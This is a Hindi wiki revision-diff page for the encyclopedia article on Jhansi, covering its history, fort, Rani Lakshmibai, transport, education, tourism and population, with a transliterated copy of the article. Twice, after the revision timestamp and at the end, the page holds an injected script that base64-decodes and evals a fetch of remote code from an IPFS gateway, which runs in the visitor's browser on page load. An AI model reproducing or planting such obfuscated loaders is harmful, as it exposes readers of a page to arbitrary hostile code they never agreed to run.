Difference between revisions of "झाँसी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "पेशवा" to "पेशवा")
Line 1: Line 1:
*[[उत्तर प्रदेश]] का यह नगर मध्यकालीन है।  
+
{{tocright}}
*यहाँ का दुर्ग [[ओरछा]] नरेश वीरसिंह बुन्देला ने 17वीं सदी मे बनवाया था।  
+
झाँसी शहर दक्षिण- पश्चिम [[उत्तर प्रदेश]] राज्य के उत्तर [[भारत]] एक प्रमुख सड़क व रेल जंक्शन पर स्थित मुख्य शहर है। यह एक दीवार से घिरा है, 1613 में [[ओरछा]] शासक द्वारा बनवाए गए क़िले के आसपास बसाया गया था। [[उत्तर प्रदेश]] का यह नगर मध्यकालीन है।  
*कालांतर मे यह [[पेशवा]] बाजीराव द्वितीय के अधीन हो गया।  
+
==इतिहास==
*1857 ई. में [[भारत]] के तथाकथित प्रथम स्वतंत्रता संग्राम में यहाँ की [[झाँसी की रानी लक्ष्मीबाई|रानी लक्ष्मीबाई]] ने अंग्रेज़ों का जिस शौर्य एवं वीरता से मुक़ाबला किया, वह इतिहास प्रसिद्ध है।  
+
*1732 में यह क्षेत्र मराठों के क़ब्जे में चला गया और 1853 में इस पर ब्रिटिश अधिकार हो गया। [[1857]] के विद्रोह में यहाँ ब्रिटिश अधिकारियों व नागरिक का संहार हुआ। [[1886]] में झाँसी ब्रिटिश शासन के अधीन हो गया और इसके बदले उन्हें [[ग्वालियर]] ख़ाली करना पड़ा।
 +
*यहाँ का दुर्ग ओरछा नरेश वीरसिंह बुन्देला ने 17वीं सदी मे बनवाया था। कालांतर मे यह [[पेशवा]] बाजीराव द्वितीय के अधीन हो गया। [[1857]] ई. में [[भारत]] के तथाकथित प्रथम स्वतंत्रता संग्राम में यहाँ की [[झाँसी की रानी लक्ष्मीबाई|रानी लक्ष्मीबाई]] ने अंग्रेज़ों का जिस शौर्य एवं वीरता से मुक़ाबला किया, वह इतिहास प्रसिद्ध है।
 +
==कृषि और उद्योग==
 +
झाँसी शहर में एक कृषि बाज़ार है और यहाँ स्टील रोलिंग मिल होने के साथ विनिर्माण कार्य भी होता है।
 +
==परिवहन==
 +
;<u>वायु मार्ग</u>
 +
झाँसी से 100 किमी. की दूरी पर स्थित ग्वालियर निकटतम एयरपोर्ट है। यह एयरपोर्ट [[दिल्ली]], [[मुम्बई]], [[वाराणसी]], [[बैंगलोर]] आदि शहरों से हवाई उड़ान के माध्यम से जुड़ा हुआ है।
 +
;<u>रेल मार्ग</u>
 +
झाँसी का रलवे स्टेशन भारत के तमाम प्रमुख शहरों अनेकों रेलगाड़ियों से जुड़ा है।
 +
;<u>सड़क मार्ग</u>
 +
झाँसी में राष्ट्रीय राजमार्ग 25 और 26 से अनेक शहरों से पहुँचा जा सकता है। उत्तर प्रदेश राज्य परिवहन निगम की बसें झाँसी पहुँचने के लिए अपनी सुविधा मुहैया कराती हैं।
 +
==शिक्षा==
 +
*यहाँ [[बुंदेलखंड]] विश्वविद्यालय है और रेलवे कॉलोनी व कार्यशालाएं भी है।
 +
*यहाँ बुंदेलखंड इंजीनियरिंग इंस्टिट्यूट व एम.एल. बी. मेडिकल कॉलेज भी है।
 +
==पर्यटन==
 +
;<u>झाँसी क़िला</u>
 +
झाँसी का क़िला उत्तर प्रदेश ही नहीं भारत के सबसे बेहतरीन क़िलों में से एक है। ओरछा के राजा बीर सिंह देव ने यह क़िला 1613 ई. में बनवाया था। क़िला बंगरा नामक पहाड़ी पर बना है। क़िले में प्रवेश के लिए दस दरवाजे हैं। क़िले में रानी झाँसी गार्डन, [[शिव]] मंदिर और गुलाम गौस ख़ान, मोती बाई व खुदा बक्श की मजार देखी जा सकती है।
 +
;<u>रानी महल</u>
 +
रानी लक्ष्मीबाई के इस महल की दीवारों और छतों को अनेक रंगों और चित्रकारियों से सजाया गया है। वर्तमान में क़िले को संग्रहालय में तब्दील कर दिया गया है। यहां नौवीं से बारहवीं शताब्दी की प्राचीन मूर्तियों का विस्तृत संग्रह देखा जा सकता है। 
 +
;<u>झांसी संग्रहालय</u>
 +
झाँसी क़िले में स्थित यह संग्रहालय इतिहास में रूचि रखने वाले पर्यटकों का मनपसंद स्थान है। यह संग्रहालय केवल झाँसी की ऐतिहासिक धरोहर को ही नहीं अपितु सम्पूर्ण बुन्देलखण्ड की झलक प्रस्तुत करता है। 
 +
;<u>गणेश मंदिर</u>
 +
भगवान [[गणेश]] को समर्पित इस मंदिर में महाराज गंगाधर राव और वीरांगना लक्ष्मीबाई का विवाह हुआ था। झाँसी के नज़दीकी पर्यटन स्थलों में ओरछा, बरूआ सागर, शिवपुरी, दतिया, ग्वालियर, खजुराहो, महोबा, टोड़ी फतेहपुर, आदि भी दर्शनीय स्थल हैं।
 +
==जनसंख्या==
 +
झाँसी ज़िले की कुल जनसंख्या ([[2001]] की गणना के अनुसार) कुल 17,46,715 है। नगर की जनसंख्या 3,83,248 है।  
  
 
{{लेख प्रगति
 
{{लेख प्रगति

Revision as of 09:59, 13 December 2010

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

jhaansi shahar dakshin- pashchim uttar pradesh rajy ke uttar bharat ek pramukh s dak v rel jankshan par sthit mukhy shahar hai. yah ek divar se ghira hai, 1613 mean orachha shasak dvara banavae ge qile ke asapas basaya gaya tha. uttar pradesh ka yah nagar madhyakalin hai.

itihas

  • 1732 mean yah kshetr marathoan ke qabje mean chala gaya aur 1853 mean is par british adhikar ho gaya. 1857 ke vidroh mean yahaan british adhikariyoan v nagarik ka sanhar hua. 1886 mean jhaansi british shasan ke adhin ho gaya aur isake badale unhean gvaliyar khali karana p da.
  • yahaan ka durg orachha naresh virasianh bundela ne 17vian sadi me banavaya tha. kalaantar me yah peshava bajirav dvitiy ke adhin ho gaya. 1857 ee. mean bharat ke tathakathit pratham svatantrata sangram mean yahaan ki rani lakshmibaee ne aangrezoan ka jis shaury evan virata se muqabala kiya, vah itihas prasiddh hai.

krishi aur udyog

jhaansi shahar mean ek krishi bazar hai aur yahaan stil roliang mil hone ke sath vinirman kary bhi hota hai.

parivahan

vayu marg

jhaansi se 100 kimi. ki doori par sthit gvaliyar nikatatam eyaraport hai. yah eyaraport dilli, mumbee, varanasi, baiangalor adi shaharoan se havaee u dan ke madhyam se ju da hua hai.

rel marg

jhaansi ka ralave steshan bharat ke tamam pramukh shaharoan anekoan relaga diyoan se ju da hai.

s dak marg

jhaansi mean rashtriy rajamarg 25 aur 26 se anek shaharoan se pahuancha ja sakata hai. uttar pradesh rajy parivahan nigam ki basean jhaansi pahuanchane ke lie apani suvidha muhaiya karati haian.

shiksha

  • yahaan buandelakhand vishvavidyalay hai aur relave k aauloni v karyashalaean bhi hai.
  • yahaan buandelakhand ianjiniyariang ianstityoot v em.el. bi. medikal k aaulej bhi hai.

paryatan

jhaansi qila

jhaansi ka qila uttar pradesh hi nahian bharat ke sabase behatarin qiloan mean se ek hai. orachha ke raja bir sianh dev ne yah qila 1613 ee. mean banavaya tha. qila bangara namak paha di par bana hai. qile mean pravesh ke lie das daravaje haian. qile mean rani jhaansi gardan, shiv mandir aur gulam gaus khan, moti baee v khuda baksh ki majar dekhi ja sakati hai.

rani mahal

rani lakshmibaee ke is mahal ki divaroan aur chhatoan ko anek rangoan aur chitrakariyoan se sajaya gaya hai. vartaman mean qile ko sangrahalay mean tabdil kar diya gaya hai. yahaan nauvian se barahavian shatabdi ki prachin moortiyoan ka vistrit sangrah dekha ja sakata hai.

jhaansi sangrahalay

jhaansi qile mean sthit yah sangrahalay itihas mean roochi rakhane vale paryatakoan ka manapasand sthan hai. yah sangrahalay keval jhaansi ki aitihasik dharohar ko hi nahian apitu sampoorn bundelakhand ki jhalak prastut karata hai.

ganesh mandir

bhagavan ganesh ko samarpit is mandir mean maharaj gangadhar rav aur viraangana lakshmibaee ka vivah hua tha. jhaansi ke nazadiki paryatan sthaloan mean orachha, barooa sagar, shivapuri, datiya, gvaliyar, khajuraho, mahoba, to di phatehapur, adi bhi darshaniy sthal haian.

janasankhya

jhaansi zile ki kul janasankhya (2001 ki ganana ke anusar) kul 17,46,715 hai. nagar ki janasankhya 3,83,248 hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>